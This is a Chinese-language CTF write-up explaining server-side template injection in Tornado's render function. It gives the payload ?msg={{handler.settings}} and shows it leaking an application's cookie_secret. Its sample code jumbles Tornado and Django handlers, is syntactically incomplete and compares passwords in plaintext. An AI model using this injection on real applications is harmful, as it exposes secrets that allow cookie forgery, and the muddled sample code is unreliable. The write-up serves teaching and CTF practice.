python SSTI tornado render模板注入

原理
tornado render是python中的一個渲染函數，也就是一種模板，通過調用的參數不同，生成不同的網頁，如果用戶對render內容可控，不僅可以注入XSS代碼，而且還可以通過{{}}進行傳遞變量和執行簡單的表達式。
簡單的理解例子如下：
------------------------------------------------------------------------------------
import tornado.ioloop
import tornado.web
 
class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.render('index.html')       
class LoginHandler(BaseHandler):
    def get(self):
        '''
        當用戶訪登錄的時候我們就得給他寫cookie了,但是這里沒有寫在哪里寫了呢?
        在哪里呢?之前寫的Handler都是繼承的RequestHandler,這次繼承的是BaseHandler是自己寫的Handler
        繼承自己的類,在類了加擴展initialize! 在這里我們可以在這里做獲取用戶cookie或者寫cookie都可以在這里做
        '''
        '''
        我們知道LoginHandler對象就是self,我們可不可以self.set_cookie()可不可以self.get_cookie()
        '''
        # self.set_cookie()
        # self.get_cookie()
        self.render('login.html', **{'status': ''})
def login(request):
    #獲取用戶輸入
    login_form = AccountForm.LoginForm(request.POST)
    if request.method == 'POST':
        #判斷用戶輸入是否合法
        if login_form.is_valid():#如果用戶輸入是合法的
            username = request.POST.get('username')
            password = request.POST.get('password')
            if models.UserInfo.objects.get(username=username) and models.UserInfo.objects.get(username=username).password == password:
                    request.session['auth_user'] = username
                    return redirect('/index/')
            else:
                return render(request,'account/login.html',{'model': login_form,'backend_autherror':'用戶名或密碼錯誤'})
        else:
            error_msg = login_form.errors.as_data()
            return render(request,'account/login.html',{'model': login_form,'errors':error_msg})
    # 如果登錄成功，寫入session，跳轉index
    return render(request, 'account/login.html', {'model': login_form}
-------------------------------------------------------------------------------------

由上面可知:render是一個類似模板的東西，可以使用不同的參數來訪問網頁
在tornado模板中，存在一些可以訪問的快速對象，例如
         {{ escape(handler.settings["cookie"]) }}

這兩個{{}}和這個字典對象也許大家就看出來了，沒錯就是這個handler.settings對象
handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所有handler.settings就指向RequestHandler.application.settings了！

大概就是說，這里面就是我們一下環境變量，我們正是從這里獲取的cookie_secret

看題目的錯誤頁面

 

 

可見頁面返回的由msg的值決定,修改msg的值形成注入,獲得環境變量
?msg={{handler.settings}}  (見上面灰色高顯部分)
頁面回顯環境變量
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r'}
得到cookie_secret